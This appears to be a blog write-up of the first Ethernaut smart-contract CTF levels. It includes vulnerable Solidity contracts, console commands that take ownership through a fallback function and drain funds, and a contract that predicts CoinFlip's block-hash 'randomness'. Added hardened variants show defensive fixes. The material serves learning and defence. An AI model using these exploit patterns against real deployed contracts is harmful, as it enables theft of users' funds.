
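[CTF] Ethernaut Write-up (work in progress)

Date: 2023-03-24 19:45:16  Views: 60
Tags: function sender uint256 msg CTF WP owner Ethernaut public

I just woke up, and how come everyone knows blockchain now? Looks like I have no choice but to learn it.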

[Level 1] Hello Ethernaut

A fairly basic introductory tutorial.

Just start from the hint you are given at 9 and follow it all the way down.

As follows:

[image]

Then simply submit.

[Level 2] Fallback

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Fallback {

  mapping(address => uint) public contributions;
  address public owner;

  constructor() {
    owner = msg.sender;
    contributions[msg.sender] = 1000 * (1 ether);
  }

  modifier onlyOwner {
        require(
            msg.sender == owner,
            "caller is not the owner"
        );
        _;
    }

  function contribute() public payable {
    require(msg.value < 0.001 ether);
    contributions[msg.sender] += msg.value;
    if(contributions[msg.sender] > contributions[owner]) {
      owner = msg.sender;
    }
  }

  function getContribution() public view returns (uint) {
    return contributions[msg.sender];
  }

  function withdraw() public onlyOwner {
    payable(owner).transfer(address(this).balance);
  }

  receive() external payable {
    require(msg.value > 0 && contributions[msg.sender] > 0);
    owner = msg.sender;
  }
}

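As the name suggests, this level tests the fallback function, i.e. receive() in the contract. It is invoked automatically when a transaction is sent directly to the contract without calling any function.

The level requires you to:

  1. Become the owner of the contract
  2. Transfer out all of the contract's funds

The only functions that can set owner = msg.sender are contribute and receive. But the owner has contributed 1000 ETH and each call to contribute must send less than 0.001 ETH, so pushing your contribution above the owner's is clearly impossible. That leaves receive, which only needs you to send some ETH while your contributions entry is greater than 0. The approach is then clear: first call contribute with 1 wei, then send 1 wei directly to the contract, and you become the owner. Once you are the owner, call withdraw to take all the funds.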

await contract.contribute.sendTransaction({value:1})
await contract.sendTransaction({value:1})
await contract.owner() // check whether the current owner is now you
await contract.withdraw() // withdraw all the funds
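
A hardened variant of the contract above, added here as an example (it is not part of the original post or of Ethernaut): receive() only logs the transfer, contribution size grants no privilege, and ownership moves only through an explicit two-step hand-over. The names FallbackHardened, Received, pendingOwner, transferOwnership and acceptOwnership are assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example, not the Ethernaut contract; all new names are hypothetical.
contract FallbackHardened {
  mapping(address => uint256) public contributions;
  address public owner;
  address public pendingOwner;

  event Received(address indexed from, uint256 amount);

  constructor() {
    owner = msg.sender;
  }

  modifier onlyOwner {
    require(msg.sender == owner, "caller is not the owner");
    _;
  }

  // Contributions are only accounted for; their size grants no privilege.
  function contribute() external payable {
    require(msg.value > 0 && msg.value < 0.001 ether, "bad amount");
    contributions[msg.sender] += msg.value;
  }

  // A plain ether transfer is logged and never touches `owner`.
  receive() external payable {
    emit Received(msg.sender, msg.value);
  }

  // Step 1: only the current owner can nominate a successor.
  function transferOwnership(address newOwner) external onlyOwner {
    require(newOwner != address(0), "zero address");
    pendingOwner = newOwner;
  }

  // Step 2: the nominee must accept from its own address.
  function acceptOwnership() external {
    require(msg.sender == pendingOwner, "caller is not the pending owner");
    owner = pendingOwner;
    pendingOwner = address(0);
  }

  function withdraw() external onlyOwner {
    payable(owner).transfer(address(this).balance);
  }
}
```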


[Level 3] Fallout

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import 'openzeppelin-contracts-06/math/SafeMath.sol';

contract Fallout {
  
  using SafeMath for uint256;
  mapping (address => uint) allocations;
  address payable public owner;


  /* constructor */
  function Fal1out() public payable {
    owner = msg.sender;
    allocations[owner] = msg.value;
  }

  modifier onlyOwner {
	        require(
	            msg.sender == owner,
	            "caller is not the owner"
	        );
	        _;
	    }

  function allocate() public payable {
    allocations[msg.sender] = allocations[msg.sender].add(msg.value);
  }

  function sendAllocation(address payable allocator) public {
    require(allocations[allocator] > 0);
    allocator.transfer(allocations[allocator]);
  }

  function collectAllocations() public onlyOwner {
    msg.sender.transfer(address(this).balance);
  }

  function allocatorBalance(address allocator) public view returns (uint) {
    return allocations[allocator];
  }
}

This level is actually very simple: just send a transaction to Fal1out (note that it is the digit 1, not the letter l).

await contract.Fal1out.sendTransaction({value:1})

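What this level is really about is the relationship between a contract's constructor and the contract's name, and the vulnerability that relationship can cause. In older Solidity versions the constructor was a function with the same name as the contract; here the function is called Fal1out rather than Fallout, so despite the /* constructor */ comment it is an ordinary public function that anyone can call to set owner.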


[Level 4] Coin Flip

pragma solidity ^0.8.0;

contract CoinFlip {

  uint256 public consecutiveWins;
  uint256 lastHash;
  uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;

  constructor() {
    consecutiveWins = 0;
  }

  function flip(bool _guess) public returns (bool) {
    uint256 blockValue = uint256(blockhash(block.number - 1));

    if (lastHash == blockValue) {
      revert();
    }

    lastHash = blockValue;
    uint256 coinFlip = blockValue / FACTOR;
    bool side = coinFlip == 1 ? true : false;

    if (side == _guess) {
      consecutiveWins++;
      return true;
    } else {
      consecutiveWins = 0;
      return false;
    }
  }
}

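block.number is public and the same for everyone, so the "random" number here is not random at all: a contract called in the same block sees the same blockhash(block.number - 1). Use the Remix Solidity IDE to write a contract that computes side and calls the CoinFlip contract's flip function. After deploying it, run it 10 times so that await contract.consecutiveWins() returns 10.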

pragma solidity ^0.8.0;

contract CoinFlip {

  uint256 public consecutiveWins;
  uint256 lastHash;
  uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;

  constructor() {
    consecutiveWins = 0;
  }

  function flip(bool _guess) public returns (bool) {
    uint256 blockValue = uint256(blockhash(block.number - 1));

    if (lastHash == blockValue) {
      revert();
    }

    lastHash = blockValue;
    uint256 coinFlip = blockValue / FACTOR;
    bool side = coinFlip == 1 ? true : false;

    if (side == _guess) {
      consecutiveWins++;
      return true;
    } else {
      consecutiveWins = 0;
      return false;
    }
  }
}

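contract hack {
  // Same divisor that CoinFlip uses
  uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;
  // Address of the deployed CoinFlip instance
  CoinFlip c = CoinFlip(0x1df38aBE66df10C0daAae16f1d4898d127eE0A61);

  // Recomputes CoinFlip's side from the same previous-block hash and passes it as the guess.
  // Call once per block: flip() reverts when the block hash equals lastHash.
  function exp() public {
      uint256 blockValue = uint256(blockhash(block.number - 1));
      uint256 coinFlip = blockValue / FACTOR;
      bool side = coinFlip == 1 ? true : false;
      c.flip(side);
  }
}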
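
One way to remove the same-block prediction shown above, added here as an example (it is not part of the original post or of Ethernaut): the guess is recorded first and settled against the hash of a block that did not exist when the guess was made. The names CoinFlipDeferred, Guess, pending, placeGuess and settle are assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example, not the Ethernaut contract; all new names are hypothetical.
contract CoinFlipDeferred {
  // Same value as FACTOR on the page (2**255): the quotient is the hash's top bit.
  uint256 constant FACTOR = 2**255;

  struct Guess {
    uint256 placedAt; // block in which the guess was recorded (0 = none)
    bool side;
  }

  mapping(address => Guess) public pending;
  mapping(address => uint256) public consecutiveWins;

  // The guess is fixed before the deciding block hash exists.
  function placeGuess(bool _side) external {
    require(pending[msg.sender].placedAt == 0, "guess already pending");
    pending[msg.sender] = Guess(block.number, _side);
  }

  // Settles against the hash of the block after the guess.
  function settle() external returns (bool) {
    Guess memory g = pending[msg.sender];
    require(g.placedAt != 0, "no pending guess");
    require(block.number > g.placedAt + 1, "deciding block not mined yet");
    delete pending[msg.sender];

    // blockhash() returns 0 for blocks older than the most recent 256.
    // An expired guess counts as a loss, so waiting out a bad result does not help.
    bytes32 h = blockhash(g.placedAt + 1);
    bool won = h != bytes32(0) && (uint256(h) / FACTOR == 1) == g.side;

    if (won) {
      consecutiveWins[msg.sender]++;
    } else {
      consecutiveWins[msg.sender] = 0;
    }
    return won;
  }
}
```

A block producer can still bias a block hash, so anything that carries real value should take its randomness from a verifiable source such as a VRF oracle instead.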


[Level 5] Telephone

From: https://www.cnblogs.com/timlzh/p/17253060.html
